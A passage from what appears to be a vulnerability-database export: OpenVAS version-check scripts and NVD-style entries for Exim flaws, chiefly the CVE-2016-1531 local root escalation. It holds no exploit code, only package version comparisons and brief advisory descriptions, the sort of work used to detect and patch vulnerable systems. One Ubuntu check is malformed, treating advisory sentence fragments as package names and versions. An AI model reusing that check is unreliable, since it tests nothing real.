This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807496\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 06:07:56 +0100 (Mon, 14 Mar 2016)\");\n script_cve_id(\"CVE-2016-1531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178772.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.85.2~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-12T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2016:0721-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851232", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851232\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-12 06:15:07 +0100 (Sat, 12 Mar 2016)\");\n script_cve_id(\"CVE-2016-1531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2016:0721-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update to exim 4.86.2 fixes the following issues:\n\n * CVE-2016-1531: local privilege escalation for set-uid root exim when\n using 'perl_startup' (boo#968844)\n\n Important: Exim now cleans the complete execution environment by default.\n This affects Exim and subprocesses such as transports calling other\n programs. The following new options are supported to adjust this behaviour:\n\n * keep_environment\n\n * add_environment A warning will be printed upon startup if none of these\n are configured.\n\n Also includes upstream changes, improvements and bug fixes:\n\n * Support for using the system standard CA bundle.\n\n * New expansion items $config_file, $config_dir, containing the file and\n directory name of the main configuration file. 
Also $exim_version.\n\n * New 'malware=' support for Avast.\n\n * New 'spam=' variant option for Rspamd.\n\n * Assorted options on malware= and spam= scanners.\n\n * A commandline option to write a comment into the logfile.\n\n * A logging option for slow DNS lookups.\n\n * New ${env { variable }} expansion.\n\n * A non-SMTP authenticator using information from TLS client\n certificates.\n\n * Main option 'tls_eccurve' for selecting an Elliptic Curve for TLS.\n\n * Main option 'dns_trust_aa' for trusting your local nameserver at the\n same level as DNSSEC.\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0721-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", 
rpm:\"eximon-debuginfo~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:26", "description": "A local root privilege escalation\nvulnerability was found in Exim, Debian", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3517-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703517", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3517.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3517-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703517\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-1531\");\n script_name(\"Debian Security Advisory DSA 3517-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 00:00:00 +0100 (Mon, 14 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3517.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8|9)\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution\n(wheezy), this problem has been fixed in version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"A local root privilege escalation\nvulnerability 
was found in Exim, Debian's default mail transfer agent, in\nconfigurations using the perl_startup option (Only Exim via\nexim4-daemon-heavy enables Perl support).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.80-7+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"eximon4\", ver:\"4.86.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:05", "description": "Exim < 4.86.2 Local Root Privilege Escalation", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Exim Local Root / Privilege Escalation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310105568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_cve_2016_1531.nasl 12083 2018-10-25 09:48:10Z cfischer $\n#\n# Exim Local Root / Privilege Escalation Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105568\");\n script_cve_id(\"CVE-2016-1531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12083 $\");\n\n script_name(\"Exim Local Root / Privilege Escalation Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.exim.org/static/doc/CVE-2016-1531.txt\");\n\n script_tag(name:\"insight\", value:\"When Exim installation has been compiled with Perl support and contains a perl_startup configuration variable it can be exploited by malicious local attackers to gain root privileges.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Update to Exim 4.86.2 or newer.\");\n\n script_tag(name:\"summary\", value:\"Exim < 4.86.2 Local Root Privilege Escalation\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 11:48:10 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 13:17:46 +0100 (Tue, 15 Mar 2016)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_family(\"SMTP problems\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n 
exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:version, test_version:\"4.86.2\" ) )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:\"4.86.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-16T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-2933-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531", "CVE-2014-2972"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-2933-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842695\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-16 06:09:39 +0100 (Wed, 16 Mar 2016)\");\n script_cve_id(\"CVE-2016-1531\", \"CVE-2014-2972\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-2933-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly\n filtered environment variables when used with the perl_startup configuration\n option. If the perl_startup option was enabled, a local attacker could use this\n issue to escalate their privileges to the root user. This issue has been fixed\n by having Exim clean the complete execution environment by default on startup,\n including any subprocesses such as transports that call other programs. This\n change in behaviour may break existing installations and can be adjusted by\n using two new configuration options, keep_environment and add_environment.\n (CVE-2016-1531)\n\n Patrick William discovered that Exim incorrectly expanded mathematical\n comparisons twice. 
A local attacker could possibly use this issue to\n perform arbitrary file operations as the Exim user. This issue only\n affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972)\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2933-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2933-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.82-3ubuntu2.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.76-3ubuntu3.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.76-3ubuntu3.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.76-3ubuntu3.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"existing\", ver:\"installations. After performing a standard system update, the new\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"to\", ver:\"adjust the new behaviour.\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86-3ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86-3ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T03:43:15", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-15T12:47:00", "id": "PRION:CVE-2016-9963", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T02:56:44", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-12T13:35:00", "id": "PRION:CVE-2017-1000369", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:28:06", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T23:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 